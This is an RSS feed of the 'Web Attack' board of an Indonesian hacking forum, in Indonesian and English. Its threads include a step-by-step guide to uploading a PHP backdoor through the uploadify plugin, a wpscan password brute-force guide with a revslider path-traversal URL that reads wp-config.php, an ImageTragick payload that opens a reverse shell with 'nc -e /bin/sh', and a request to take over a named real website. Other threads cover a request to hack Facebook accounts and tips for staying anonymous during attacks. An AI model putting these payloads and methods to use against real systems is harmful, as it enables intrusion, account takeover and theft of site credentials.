<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0" xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:dc="http://purl.org/dc/elements/1.1/">
	<channel>
		<title><![CDATA[BackBox Indonesia - Web Attack]]></title>
		<link>https://www.backboxindonesia.or.id/</link>
		<description><![CDATA[BackBox Indonesia - https://www.backboxindonesia.or.id]]></description>
		<pubDate>Thu, 14 May 2026 16:41:27 +0000</pubDate>
		<generator>MyBB</generator>
		<item>
			<title><![CDATA[Membuat virtual lab untuk pentest ( Docker Backbox )]]></title>
			<link>https://www.backboxindonesia.or.id/thread-239.html</link>
			<pubDate>Wed, 02 May 2018 07:20:37 +0000</pubDate>
			<guid isPermaLink="false">https://www.backboxindonesia.or.id/thread-239.html</guid>
			<description><![CDATA[Oke kali ini saya akan share pengalaman saya dalam melakukan penetrasi jika kita ingin tetap anonim dalam melakukan serangan dari publik menggunakan container backbox.<br />
Dalam judul kali ini saya akan membahas bagaimana caranya vps kita bisa di remot dari browser kita, penasaran bukan??<br />
Caranya cukup sederhana, pertama kita install terlebih dahulu docker dengan mengetikan perintah ini di vps <span style="font-weight: bold;" class="mycode_b"><span style="color: #33cc33;" class="mycode_color">ubuntu</span></span> kalian.<br />
<br />
<div class="codeblock"><div class="title">Code:</div><div class="body" dir="ltr"><code>&#36; sudo apt-get install docker.io</code></div></div><br />
setelah itu kita download container backboxnya dengan mengetikan perintah ini<br />
<br />
<div class="codeblock"><div class="title">Code:</div><div class="body" dir="ltr"><code>&#36; sudo docker pull claudioviviani/backbox4browser-xfce-full<br />
&#36; sudo docker run -t -i -d -p 6080:6080 claudioviviani/backbox4browser-xfce-full</code></div></div><br />
<br />
Cukup mudah bukan cara installasinya?? hehe<br />
Kalo sudah terinstall kita coba buka ip vps kita di browser dengan menambahkan port 6080. Kurang lebih tampilannya seperti ini.<br />
<br />
<img src="http://i.prntscr.com/bDopU8waQx6mcVe3dPzebQ.png" alt="[Image: bDopU8waQx6mcVe3dPzebQ.png]" class="mycode_img" /><br />
<br />
Di sini kita sudah menginstall container backbox di vps kita.<br />
Untuk masuk ke mode root password defaultnya adalah<br />
<br />
<div class="codeblock"><div class="title">Code:</div><div class="body" dir="ltr"><code>Pass : bbuser</code></div></div><br />
Note : password sebaiknya kalian ganti setelah installasi, karena untuk menghindari agar containernya tidak di otak atik oleh orang lain.<br />
<br />
<br />
Di sini posisi container kita port nya masih bisa di akses publik, alangkah baiknya vps kita di <span style="color: #33cc33;" class="mycode_color">tutup portnya menggunakan firewall</span>. Kalian bisa menggunakan iptables atau ufw ( unix firewall ) untuk menutup port tersebut. Setelah itu kalian <span style="color: #33cc33;" class="mycode_color">install server openvpn di vps kalian</span> agar si container tidak di akses oleh sembarang orang.<br />
<br />
Sedikit tips aja jika kalian ingin tetap anonim di dalam container yang telah kita buat, kita bisa menggunakan tor di browser kita.<br />
Setingnya kurang lebih seperti ini<br />
<br />
<img src="http://i.prntscr.com/W7v3aZgZQV6exMl9lDTu2A.png" alt="[Image: W7v3aZgZQV6exMl9lDTu2A.png]" class="mycode_img" /><br />
<br />
atau kalo di terminal kita ingin menggunakan tor juga kita bisa menggunakan tsocks.<br />
<br />
Mungkin cukup sekian pembahasan kali ini. Kurang lebih nya mohon di ma'lum. hehe]]></description>
			<content:encoded><![CDATA[Oke kali ini saya akan share pengalaman saya dalam melakukan penetrasi jika kita ingin tetap anonim dalam melakukan serangan dari publik menggunakan container backbox.<br />
Dalam judul kali ini saya akan membahas bagaimana caranya vps kita bisa di remot dari browser kita, penasaran bukan??<br />
Caranya cukup sederhana, pertama kita install terlebih dahulu docker dengan mengetikan perintah ini di vps <span style="font-weight: bold;" class="mycode_b"><span style="color: #33cc33;" class="mycode_color">ubuntu</span></span> kalian.<br />
<br />
<div class="codeblock"><div class="title">Code:</div><div class="body" dir="ltr"><code>&#36; sudo apt-get install docker.io</code></div></div><br />
setelah itu kita download container backboxnya dengan mengetikan perintah ini<br />
<br />
<div class="codeblock"><div class="title">Code:</div><div class="body" dir="ltr"><code>&#36; sudo docker pull claudioviviani/backbox4browser-xfce-full<br />
&#36; sudo docker run -t -i -d -p 6080:6080 claudioviviani/backbox4browser-xfce-full</code></div></div><br />
<br />
Cukup mudah bukan cara installasinya?? hehe<br />
Kalo sudah terinstall kita coba buka ip vps kita di browser dengan menambahkan port 6080. Kurang lebih tampilannya seperti ini.<br />
<br />
<img src="http://i.prntscr.com/bDopU8waQx6mcVe3dPzebQ.png" alt="[Image: bDopU8waQx6mcVe3dPzebQ.png]" class="mycode_img" /><br />
<br />
Di sini kita sudah menginstall container backbox di vps kita.<br />
Untuk masuk ke mode root password defaultnya adalah<br />
<br />
<div class="codeblock"><div class="title">Code:</div><div class="body" dir="ltr"><code>Pass : bbuser</code></div></div><br />
Note : password sebaiknya kalian ganti setelah installasi, karena untuk menghindari agar containernya tidak di otak atik oleh orang lain.<br />
<br />
<br />
Di sini posisi container kita port nya masih bisa di akses publik, alangkah baiknya vps kita di <span style="color: #33cc33;" class="mycode_color">tutup portnya menggunakan firewall</span>. Kalian bisa menggunakan iptables atau ufw ( unix firewall ) untuk menutup port tersebut. Setelah itu kalian <span style="color: #33cc33;" class="mycode_color">install server openvpn di vps kalian</span> agar si container tidak di akses oleh sembarang orang.<br />
<br />
Sedikit tips aja jika kalian ingin tetap anonim di dalam container yang telah kita buat, kita bisa menggunakan tor di browser kita.<br />
Setingnya kurang lebih seperti ini<br />
<br />
<img src="http://i.prntscr.com/W7v3aZgZQV6exMl9lDTu2A.png" alt="[Image: W7v3aZgZQV6exMl9lDTu2A.png]" class="mycode_img" /><br />
<br />
atau kalo di terminal kita ingin menggunakan tor juga kita bisa menggunakan tsocks.<br />
<br />
Mungkin cukup sekian pembahasan kali ini. Kurang lebih nya mohon di ma'lum. hehe]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[ASK]]></title>
			<link>https://www.backboxindonesia.or.id/thread-172.html</link>
			<pubDate>Thu, 20 Oct 2016 07:38:47 +0000</pubDate>
			<guid isPermaLink="false">https://www.backboxindonesia.or.id/thread-172.html</guid>
			<description><![CDATA[gimana cara nyari halaman login admin sebuah web ?]]></description>
			<content:encoded><![CDATA[gimana cara nyari halaman login admin sebuah web ?]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[Upload Webshell from Uploadify Plugin]]></title>
			<link>https://www.backboxindonesia.or.id/thread-170.html</link>
			<pubDate>Thu, 13 Oct 2016 07:44:18 +0000</pubDate>
			<guid isPermaLink="false">https://www.backboxindonesia.or.id/thread-170.html</guid>
			<description><![CDATA[Hallo member disini sekalian, first thread disini nih :)  jadi kalo ada salah kata atau apapun mohon koreksinya ya para suhu disini ..<br />
<br />
Oke kali ini gw bakalan bahas gimana cara kita upload backdoor lewat plugin yang namanya <span style="font-weight: bold;" class="mycode_b">uploadify</span>, caranya simple sih. Cuman modal buat form lalu arahin actionnya ke file <span style="font-weight: bold;" class="mycode_b">uploadify.php. </span>Sorry untuk dork nya gw gak tau  :( soalnya ini gw scan web di tempat kerja gw, terus nemu folder uploadify, mungkin para suhu bisa nambahin gimana cari target uploadify berdasarkan dork nya<br />
<br />
Step :<br />
<div class="spoiler_wrap"><div class="spoiler_header"><a href="javascript:void(0);" onclick="javascript:if(parentNode.parentNode.getElementsByTagName('div')[1].style.display=='block'){parentNode.parentNode.getElementsByTagName('div')[1].style.display='none';this.innerHTML='&lt;img title=&quot;[+]&quot; alt=&quot;[+]&quot; src=&quot;/images/collapse_collapsed.png&quot; class=&quot;expandspoiler&quot; /&gt;Spoiler';}else {parentNode.parentNode.getElementsByTagName('div')[1].style.display='block';this.innerHTML='&lt;img title=&quot;[-]&quot; alt=&quot;[-]&quot; src=&quot;/images/collapse.png&quot; class=&quot;expandspoiler&quot; /&gt;Spoiler';}"><img title="[+]" alt="[+]" src="/images/collapse_collapsed.png" class="expandspoiler" />Spoiler</a></div><div class="spoiler_body" style="display: none;">
1. Cari directory uploadify di web server<br />
<br />
<img src="http://s201.kbagi.com/thumbnail?e=2rXIGtH7OYZDh359JhujWK_-uleGZcl-dC7O-NwCiaRcfCymEDOnsNezwvJDBTm3ji2bwI-d9tImiYsvX0blSkBiTJMP3rM1PhMigLNqlHw" width="600" height="400" alt="[Image: thumbnail?e=2rXIGtH7OYZDh359JhujWK_-uleG...hMigLNqlHw]" class="mycode_img" /><br />
<br />
<br />
2. Buat form, arahkan actionnya ke file <span style="font-weight: bold;" class="mycode_b">uploadify.php </span>pada webserver target, isi value dari folder sesuai dengan kemana backdoor akan kita upload, disini gw pilih di folder <span style="font-weight: bold;" class="mycode_b">/js<br />
<br />
</span><img src="http://s218.kbagi.com/thumbnail?e=NcphF4Xq3eN8GxmWnLOigxNbsMtuDd9WzwbZFHIiUGrDVPDOtVY6553fZB7nJLUqWBHj1ZD4kSy2BprXdEJ5b9FYN1pfAWt9kKWHxe25R1g" alt="[Image: thumbnail?e=NcphF4Xq3eN8GxmWnLOigxNbsMtu...KWHxe25R1g]" class="mycode_img" /><br />
<br />
<br />
3. Backdoor berhasil diupload, cek ke folder <span style="font-weight: bold;" class="mycode_b">/js</span>, disana ada file <span style="font-weight: bold;" class="mycode_b">aa.php </span>backdoor yang tadi saya upload :) <br />
<br />
<img src="http://s214.kbagi.com/thumbnail?e=3fkE_9x04PQu3ML0NoAiWTnm7z5kY0dJwrDtDE_PJPGntn3fGTP_yYZ4Pjhf2ToZdfXCVXzIiDL38miFgSxfKBkYh9_DkC7B31992am3AWY" alt="[Image: thumbnail?e=3fkE_9x04PQu3ML0NoAiWTnm7z5k...1992am3AWY]" class="mycode_img" /><br />
<br />
</div></div>
Sekian tutor sederhana dari gw ini, mohon kalo ada salah kata atau apapun deh gw minta koreksi dari para suhu disini sekalian, thanks before :D <br />
<br />
<br />
<div style="text-align: right;" class="mycode_align"><span style="font-family: Courier New;" class="mycode_font">kod0kk</span></div>]]></description>
			<content:encoded><![CDATA[Hallo member disini sekalian, first thread disini nih :)  jadi kalo ada salah kata atau apapun mohon koreksinya ya para suhu disini ..<br />
<br />
Oke kali ini gw bakalan bahas gimana cara kita upload backdoor lewat plugin yang namanya <span style="font-weight: bold;" class="mycode_b">uploadify</span>, caranya simple sih. Cuman modal buat form lalu arahin actionnya ke file <span style="font-weight: bold;" class="mycode_b">uploadify.php. </span>Sorry untuk dork nya gw gak tau  :( soalnya ini gw scan web di tempat kerja gw, terus nemu folder uploadify, mungkin para suhu bisa nambahin gimana cari target uploadify berdasarkan dork nya<br />
<br />
Step :<br />
<div class="spoiler_wrap"><div class="spoiler_header"><a href="javascript:void(0);" onclick="javascript:if(parentNode.parentNode.getElementsByTagName('div')[1].style.display=='block'){parentNode.parentNode.getElementsByTagName('div')[1].style.display='none';this.innerHTML='&lt;img title=&quot;[+]&quot; alt=&quot;[+]&quot; src=&quot;/images/collapse_collapsed.png&quot; class=&quot;expandspoiler&quot; /&gt;Spoiler';}else {parentNode.parentNode.getElementsByTagName('div')[1].style.display='block';this.innerHTML='&lt;img title=&quot;[-]&quot; alt=&quot;[-]&quot; src=&quot;/images/collapse.png&quot; class=&quot;expandspoiler&quot; /&gt;Spoiler';}"><img title="[+]" alt="[+]" src="/images/collapse_collapsed.png" class="expandspoiler" />Spoiler</a></div><div class="spoiler_body" style="display: none;">
1. Cari directory uploadify di web server<br />
<br />
<img src="http://s201.kbagi.com/thumbnail?e=2rXIGtH7OYZDh359JhujWK_-uleGZcl-dC7O-NwCiaRcfCymEDOnsNezwvJDBTm3ji2bwI-d9tImiYsvX0blSkBiTJMP3rM1PhMigLNqlHw" width="600" height="400" alt="[Image: thumbnail?e=2rXIGtH7OYZDh359JhujWK_-uleG...hMigLNqlHw]" class="mycode_img" /><br />
<br />
<br />
2. Buat form, arahkan actionnya ke file <span style="font-weight: bold;" class="mycode_b">uploadify.php </span>pada webserver target, isi value dari folder sesuai dengan kemana backdoor akan kita upload, disini gw pilih di folder <span style="font-weight: bold;" class="mycode_b">/js<br />
<br />
</span><img src="http://s218.kbagi.com/thumbnail?e=NcphF4Xq3eN8GxmWnLOigxNbsMtuDd9WzwbZFHIiUGrDVPDOtVY6553fZB7nJLUqWBHj1ZD4kSy2BprXdEJ5b9FYN1pfAWt9kKWHxe25R1g" alt="[Image: thumbnail?e=NcphF4Xq3eN8GxmWnLOigxNbsMtu...KWHxe25R1g]" class="mycode_img" /><br />
<br />
<br />
3. Backdoor berhasil diupload, cek ke folder <span style="font-weight: bold;" class="mycode_b">/js</span>, disana ada file <span style="font-weight: bold;" class="mycode_b">aa.php </span>backdoor yang tadi saya upload :) <br />
<br />
<img src="http://s214.kbagi.com/thumbnail?e=3fkE_9x04PQu3ML0NoAiWTnm7z5kY0dJwrDtDE_PJPGntn3fGTP_yYZ4Pjhf2ToZdfXCVXzIiDL38miFgSxfKBkYh9_DkC7B31992am3AWY" alt="[Image: thumbnail?e=3fkE_9x04PQu3ML0NoAiWTnm7z5k...1992am3AWY]" class="mycode_img" /><br />
<br />
</div></div>
Sekian tutor sederhana dari gw ini, mohon kalo ada salah kata atau apapun deh gw minta koreksi dari para suhu disini sekalian, thanks before :D <br />
<br />
<br />
<div style="text-align: right;" class="mycode_align"><span style="font-family: Courier New;" class="mycode_font">kod0kk</span></div>]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[brute force pass wordpress menggunakan wpscan]]></title>
			<link>https://www.backboxindonesia.or.id/thread-166.html</link>
			<pubDate>Sun, 04 Sep 2016 19:53:45 +0000</pubDate>
			<guid isPermaLink="false">https://www.backboxindonesia.or.id/thread-166.html</guid>
			<description><![CDATA[maaf sebelumnya hanya share aja mengenai penggunaan wpscan <br />
kalo misal trit ini kurang bermutu silahkan dihapus gak papa.<br />
disini ane cuma share aja penggunaan tools wpscan yang ada di BBox<br />
penggunaan wpscan bisa dibilang cukup mudah<br />
 untuk beberapa website mungkin kita bisa melihat pengguna yang ada dalam wordpress victim tapi gak semuanya, karena mungkin victim menggunakan fasilitas premium dan penggunaan cms nya bertujuan agar pemilik web mudah dalam menggunakan cms ini.<br />
<br />
untuk melihat username wordpress bisa menggunakan command<br />
sudo wpscan --url <a href="http://www.victim.com" target="_blank" class="mycode_url">http://www.victim.com</a> --enumerate u<br />
<br />
lihat hasil di akhir proses biasanya muncul <br />
<div class="codeblock"><div class="title">Code:</div><div class="body" dir="ltr"><code>Enumerating usernames ...<br />
[+] Identified the following 2 user/s:<br />
    +----+--------+-------------+<br />
    | Id | Login  | Name        |<br />
    +----+--------+-------------+<br />
    | 1  | admin  | admin       |<br />
    | 2  | bnovak | Brian Novak |<br />
    +----+--------+-------------+</code></div></div><br />
klo ga muncul lihat aja cari vuln plugin nulled ato gak update hasil scan tadi dengan tanda warna merah.<br />
<br />
setelah menemukan username:<br />
langkah selanjutnya mesti lebih greget,<br />
 beda dengan menggunakan vuln dari revslider <br />
<div class="codeblock"><div class="title">Code:</div><div class="body" dir="ltr"><code>http://victim.com/wp-admin/admin-ajax.php?action=revslider_show_image&amp;img=../wp-config.php</code></div></div>kita dapat langsung ememiliki usernam dan password tinggal mencari lokasi phpmyadmin dr web target<br />
<br />
kita mesti memiliki wordlist yang cukup banyak, <br />
dengan menggunakan wpscan dengan command <br />
<div class="codeblock"><div class="title">Code:</div><div class="body" dir="ltr"><code>--url www.example.com --wordlist darkc0de.lst --username admin</code></div></div> proses ini cukup butuh waktu.bahkan terkadang wordlist yang digunakan gak mendekati.<br />
biasanya wordlist yang digunakan hasil download.<br />
saran ane sih kita mesti lebih pinter dalam mengolah wordlist, wordlist yang digunakan sebaiknya mendekati victim dengan arti kita cari tau ttg email victim search aja nama admin yang kalian temukan , misalkan dari data diatas pengguna nya bernama admin biasanya karakter ini pemalas mungkin saja username dan pass yang digunakan <br />
<div class="codeblock"><div class="title">Code:</div><div class="body" dir="ltr"><code>username:password<br />
admin:admin<br />
admin:adminadmin <br />
admin:Adminadmin<br />
admin:ADMINADMIN<br />
admin:admiN<br />
admin:!n1p455w0rd<br />
admin:passw0rd<br />
<br />
semacam itulah wordlist yang bisa digunakan</code></div></div><br />
ya begitu lah cara membuat wordlist yang baik menurut ane, dibandingkan download wordlist ber giga2 tapi isinya kamus.<br />
menurut ane wordlist yang dibuat dengan "mendekati" victim lebih baik, tanggal lahir nama pacar tanggal lahir tanggal jadian,dll tergantung mood anda.]]></description>
			<content:encoded><![CDATA[maaf sebelumnya hanya share aja mengenai penggunaan wpscan <br />
kalo misal trit ini kurang bermutu silahkan dihapus gak papa.<br />
disini ane cuma share aja penggunaan tools wpscan yang ada di BBox<br />
penggunaan wpscan bisa dibilang cukup mudah<br />
 untuk beberapa website mungkin kita bisa melihat pengguna yang ada dalam wordpress victim tapi gak semuanya, karena mungkin victim menggunakan fasilitas premium dan penggunaan cms nya bertujuan agar pemilik web mudah dalam menggunakan cms ini.<br />
<br />
untuk melihat username wordpress bisa menggunakan command<br />
sudo wpscan --url <a href="http://www.victim.com" target="_blank" class="mycode_url">http://www.victim.com</a> --enumerate u<br />
<br />
lihat hasil di akhir proses biasanya muncul <br />
<div class="codeblock"><div class="title">Code:</div><div class="body" dir="ltr"><code>Enumerating usernames ...<br />
[+] Identified the following 2 user/s:<br />
    +----+--------+-------------+<br />
    | Id | Login  | Name        |<br />
    +----+--------+-------------+<br />
    | 1  | admin  | admin       |<br />
    | 2  | bnovak | Brian Novak |<br />
    +----+--------+-------------+</code></div></div><br />
klo ga muncul lihat aja cari vuln plugin nulled ato gak update hasil scan tadi dengan tanda warna merah.<br />
<br />
setelah menemukan username:<br />
langkah selanjutnya mesti lebih greget,<br />
 beda dengan menggunakan vuln dari revslider <br />
<div class="codeblock"><div class="title">Code:</div><div class="body" dir="ltr"><code>http://victim.com/wp-admin/admin-ajax.php?action=revslider_show_image&amp;img=../wp-config.php</code></div></div>kita dapat langsung ememiliki usernam dan password tinggal mencari lokasi phpmyadmin dr web target<br />
<br />
kita mesti memiliki wordlist yang cukup banyak, <br />
dengan menggunakan wpscan dengan command <br />
<div class="codeblock"><div class="title">Code:</div><div class="body" dir="ltr"><code>--url www.example.com --wordlist darkc0de.lst --username admin</code></div></div> proses ini cukup butuh waktu.bahkan terkadang wordlist yang digunakan gak mendekati.<br />
biasanya wordlist yang digunakan hasil download.<br />
saran ane sih kita mesti lebih pinter dalam mengolah wordlist, wordlist yang digunakan sebaiknya mendekati victim dengan arti kita cari tau ttg email victim search aja nama admin yang kalian temukan , misalkan dari data diatas pengguna nya bernama admin biasanya karakter ini pemalas mungkin saja username dan pass yang digunakan <br />
<div class="codeblock"><div class="title">Code:</div><div class="body" dir="ltr"><code>username:password<br />
admin:admin<br />
admin:adminadmin <br />
admin:Adminadmin<br />
admin:ADMINADMIN<br />
admin:admiN<br />
admin:!n1p455w0rd<br />
admin:passw0rd<br />
<br />
semacam itulah wordlist yang bisa digunakan</code></div></div><br />
ya begitu lah cara membuat wordlist yang baik menurut ane, dibandingkan download wordlist ber giga2 tapi isinya kamus.<br />
menurut ane wordlist yang dibuat dengan "mendekati" victim lebih baik, tanggal lahir nama pacar tanggal lahir tanggal jadian,dll tergantung mood anda.]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[[ASK] Cara Hack Akun Facebook tanpa phising]]></title>
			<link>https://www.backboxindonesia.or.id/thread-163.html</link>
			<pubDate>Sat, 27 Aug 2016 07:27:23 +0000</pubDate>
			<guid isPermaLink="false">https://www.backboxindonesia.or.id/thread-163.html</guid>
			<description><![CDATA[Misi gan, saya newbie niy.<br />
<br />
Mau nanya ada gk cara hack akun facebook tanpa harus menggunakan web phising (site cloner)<br />
<br />
Akun saya ada yang hack gan trus emailnya gk bisa dibuka.]]></description>
			<content:encoded><![CDATA[Misi gan, saya newbie niy.<br />
<br />
Mau nanya ada gk cara hack akun facebook tanpa harus menggunakan web phising (site cloner)<br />
<br />
Akun saya ada yang hack gan trus emailnya gk bisa dibuka.]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[[ASK] Tentang Exploit ImageTragick]]></title>
			<link>https://www.backboxindonesia.or.id/thread-162.html</link>
			<pubDate>Thu, 25 Aug 2016 05:14:44 +0000</pubDate>
			<guid isPermaLink="false">https://www.backboxindonesia.or.id/thread-162.html</guid>
			<description><![CDATA[<div class="codeblock"><div class="title">Code:</div><div class="body" dir="ltr"><code>push graphic-context<br />
 <br />
 viewbox 0 0 640 480<br />
 <br />
 fill 'url(https://127.0.0.0/ipinganteng.jpg" | nc -e /bin/sh 192.168.1.226 "31337)'<br />
 <br />
 pop graphic-context</code></div></div><br />
<span style="font-weight: bold;" class="mycode_b">"fill 'url(<a href="https://127.0.0.0/ipinganteng.jpg" target="_blank" class="mycode_url">https://127.0.0.0/oops.jpg</a>)</span>"  ini ip/url target atau apa ?<br />
<br />
dan bagaimana caranya mengetahui <span style="font-weight: bold;" class="mycode_b">port dan ip</span> yg sedang listening, contoh <span style="font-weight: bold;" class="mycode_b">"192.168.1.226 31337"</span>]]></description>
			<content:encoded><![CDATA[<div class="codeblock"><div class="title">Code:</div><div class="body" dir="ltr"><code>push graphic-context<br />
 <br />
 viewbox 0 0 640 480<br />
 <br />
 fill 'url(https://127.0.0.0/ipinganteng.jpg" | nc -e /bin/sh 192.168.1.226 "31337)'<br />
 <br />
 pop graphic-context</code></div></div><br />
<span style="font-weight: bold;" class="mycode_b">"fill 'url(<a href="https://127.0.0.0/ipinganteng.jpg" target="_blank" class="mycode_url">https://127.0.0.0/oops.jpg</a>)</span>"  ini ip/url target atau apa ?<br />
<br />
dan bagaimana caranya mengetahui <span style="font-weight: bold;" class="mycode_b">port dan ip</span> yg sedang listening, contoh <span style="font-weight: bold;" class="mycode_b">"192.168.1.226 31337"</span>]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[CMS sitefinity exploit help]]></title>
			<link>https://www.backboxindonesia.or.id/thread-159.html</link>
			<pubDate>Sun, 14 Aug 2016 20:50:36 +0000</pubDate>
			<guid isPermaLink="false">https://www.backboxindonesia.or.id/thread-159.html</guid>
			<description><![CDATA[Assalam o alaiakum,<br />
<br />
I need help brothers to shell the site which is running sitefinity CMS . <br />
<br />
<div class="codeblock"><div class="title">Code:</div><div class="body" dir="ltr"><code>roshan.af</code></div></div><br />
<br />
Looking forward for your kind response. <br />
<br />
Regards<br />
Scorpoin]]></description>
			<content:encoded><![CDATA[Assalam o alaiakum,<br />
<br />
I need help brothers to shell the site which is running sitefinity CMS . <br />
<br />
<div class="codeblock"><div class="title">Code:</div><div class="body" dir="ltr"><code>roshan.af</code></div></div><br />
<br />
Looking forward for your kind response. <br />
<br />
Regards<br />
Scorpoin]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[[ASK] Bagaimana cara Attack Ftp di backbox]]></title>
			<link>https://www.backboxindonesia.or.id/thread-158.html</link>
			<pubDate>Sun, 31 Jul 2016 10:38:20 +0000</pubDate>
			<guid isPermaLink="false">https://www.backboxindonesia.or.id/thread-158.html</guid>
			<description><![CDATA[Mungkin ada yang mau berbagi ilmu dengan saya cara attack ftp di backbox]]></description>
			<content:encoded><![CDATA[Mungkin ada yang mau berbagi ilmu dengan saya cara attack ftp di backbox]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[How to Fix Update Wpscan on BackBox]]></title>
			<link>https://www.backboxindonesia.or.id/thread-152.html</link>
			<pubDate>Thu, 21 Jul 2016 05:40:52 +0000</pubDate>
			<guid isPermaLink="false">https://www.backboxindonesia.or.id/thread-152.html</guid>
			<description><![CDATA[Ciee ketemu lagi dengan saya di Thread How to Fix Update Wpscan on BackBox semoga betah membaca yaa <br />
<br />
Ceritanya begini tadi malem saya dapat challenge dari teman saya yang merupakan salah satu developer Open Source *************** dia menyuruh saya untuk jebol web wordpress yang dia buat maka dari situ saya coba pahami alurnya dan melihat tools di Backbox saya dan ketemu dengan wpscan ini<br />
<br />
Pada saat penggunaan muncul permasalahan seperti ini<br />
anggap sudah masuk ke foolder root ketika saya mengetikan<br />
<br />
<div class="codeblock"><div class="title">Code:</div><div class="body" dir="ltr"><code>Ruby wpscan.rb --url site.com</code></div></div><br />
Muncul perintah untuk update dan saya ketikan perintah ini<br />
<div class="codeblock"><div class="title">Code:</div><div class="body" dir="ltr"><code>ruby wpscan.rb --update</code></div></div><br />
Pada saya mengetikkan perintah di atas muncul error seperti gambar ini<br />
<br />
<img src="https://imageshack.com/i/pootga8hj" width="683" height="583" alt="[Image: pootga8hj]" class="mycode_img" /><br />
<br />
<div class="codeblock"><div class="title">Code:</div><div class="body" dir="ltr"><code>[!] plugins.json: checksums do not match<br />
(local: 51b7aaeef00e4409157da221a97bc2636f73b06b9a58277e78b958fb14f8d348f57f3e2119bba28133900cf991a63e695c7bf8400c5b16c5c8301b084939a36b<br />
remote: 21b9e91faf217a366553c2e911ce5efdc34f8191ba3c2cd9b1614d9ae2515b2070c142958fec98c8a1002342b0dea8968a3a9142dabf715bc0e770d1282429ac)</code></div></div><br />
Saya terus mencoba bertanya Kepada segenap teman-teman saya dan mereka juga tidak mengetahuinya <br />
Ngubek2 Github gak ada yang fix pada akhirnya saya coba sendiri dan bisa <br />
<br />
Untuk caranya seperti dibawah ini<br />
<br />
<img src="https://imageshack.com/i/pnCc1mGlp" width="683" height="800" alt="[Image: pnCc1mGlp]" class="mycode_img" /><br />
<br />
Saya coba dengan cara scan web wordpress<br />
<br />
<div class="codeblock"><div class="title">Code:</div><div class="body" dir="ltr"><code>ruby wpscan.rb --url site.com</code></div></div><br />
Nanti ada perintah do you want to update ? [Y]es [N]o [A]bort, default: [N]<br />
<br />
Ketik saja N<br />
Dan ulangi terus sampe dia lelah kamu Phpin dia minta update ketik N saja ::) kira2 15 x la<br />
<br />
Setelah itu masukin perintah ini<br />
<br />
<div class="codeblock"><div class="title">Code:</div><div class="body" dir="ltr"><code>ruby wpscan.rb --update</code></div></div><br />
Dan pada akhirnya munculnya Notifikasi seperti ini<br />
<br />
<img src="https://imageshack.com/i/pmGVnIRRp" width="683" height="800" alt="[Image: pmGVnIRRp]" class="mycode_img" /><br />
<br />
Selamat toolsnya anda berhasil di Update Sebenarnya cara ngefixnya simple cuman untuk bisa complete saya harus begadang sampe jam 5 pagi dan foto ini saya ambil di pagi hari karena capek sangat bro ngescan terus <br />
<br />
Intinya Jangan Pernah Menyerah Dalam Menemukan Error dalam Opensource Kalian <span style="font-weight: bold;" class="mycode_b">So Keep Attack and Defence<br />
<br />
</span><br />
<blockquote class="mycode_quote"><cite>Quote:</cite><span style="font-weight: bold;" class="mycode_b"><span style="font-size: large;" class="mycode_size">" Cintailah Pasanganmu sekedarnya saja jika pada akhirnya bukan dia yang nantinya menemani hidupmu untuk selamanya "</span></span></blockquote>
]]></description>
			<content:encoded><![CDATA[Ciee ketemu lagi dengan saya di Thread How to Fix Update Wpscan on BackBox semoga betah membaca yaa <br />
<br />
Ceritanya begini tadi malem saya dapat challenge dari teman saya yang merupakan salah satu developer Open Source *************** dia menyuruh saya untuk jebol web wordpress yang dia buat maka dari situ saya coba pahami alurnya dan melihat tools di Backbox saya dan ketemu dengan wpscan ini<br />
<br />
Pada saat penggunaan muncul permasalahan seperti ini<br />
anggap sudah masuk ke foolder root ketika saya mengetikan<br />
<br />
<div class="codeblock"><div class="title">Code:</div><div class="body" dir="ltr"><code>Ruby wpscan.rb --url site.com</code></div></div><br />
Muncul perintah untuk update dan saya ketikan perintah ini<br />
<div class="codeblock"><div class="title">Code:</div><div class="body" dir="ltr"><code>ruby wpscan.rb --update</code></div></div><br />
Pada saya mengetikkan perintah di atas muncul error seperti gambar ini<br />
<br />
<img src="https://imageshack.com/i/pootga8hj" width="683" height="583" alt="[Image: pootga8hj]" class="mycode_img" /><br />
<br />
<div class="codeblock"><div class="title">Code:</div><div class="body" dir="ltr"><code>[!] plugins.json: checksums do not match<br />
(local: 51b7aaeef00e4409157da221a97bc2636f73b06b9a58277e78b958fb14f8d348f57f3e2119bba28133900cf991a63e695c7bf8400c5b16c5c8301b084939a36b<br />
remote: 21b9e91faf217a366553c2e911ce5efdc34f8191ba3c2cd9b1614d9ae2515b2070c142958fec98c8a1002342b0dea8968a3a9142dabf715bc0e770d1282429ac)</code></div></div><br />
Saya terus mencoba bertanya Kepada segenap teman-teman saya dan mereka juga tidak mengetahuinya <br />
Ngubek2 Github gak ada yang fix pada akhirnya saya coba sendiri dan bisa <br />
<br />
Untuk caranya seperti dibawah ini<br />
<br />
<img src="https://imageshack.com/i/pnCc1mGlp" width="683" height="800" alt="[Image: pnCc1mGlp]" class="mycode_img" /><br />
<br />
Saya coba dengan cara scan web wordpress<br />
<br />
<div class="codeblock"><div class="title">Code:</div><div class="body" dir="ltr"><code>ruby wpscan.rb --url site.com</code></div></div><br />
Nanti ada perintah do you want to update ? [Y]es [N]o [A]bort, default: [N]<br />
<br />
Ketik saja N<br />
Dan ulangi terus sampe dia lelah kamu Phpin dia minta update ketik N saja ::) kira2 15 x la<br />
<br />
Setelah itu masukin perintah ini<br />
<br />
<div class="codeblock"><div class="title">Code:</div><div class="body" dir="ltr"><code>ruby wpscan.rb --update</code></div></div><br />
Dan pada akhirnya munculnya Notifikasi seperti ini<br />
<br />
<img src="https://imageshack.com/i/pmGVnIRRp" width="683" height="800" alt="[Image: pmGVnIRRp]" class="mycode_img" /><br />
<br />
Selamat toolsnya anda berhasil di Update Sebenarnya cara ngefixnya simple cuman untuk bisa complete saya harus begadang sampe jam 5 pagi dan foto ini saya ambil di pagi hari karena capek sangat bro ngescan terus <br />
<br />
Intinya Jangan Pernah Menyerah Dalam Menemukan Error dalam Opensource Kalian <span style="font-weight: bold;" class="mycode_b">So Keep Attack and Defence<br />
<br />
</span><br />
